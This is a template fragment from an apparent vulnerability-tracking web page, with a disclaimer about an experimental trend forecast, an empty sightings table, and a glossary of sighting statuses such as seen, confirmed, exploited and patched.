Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…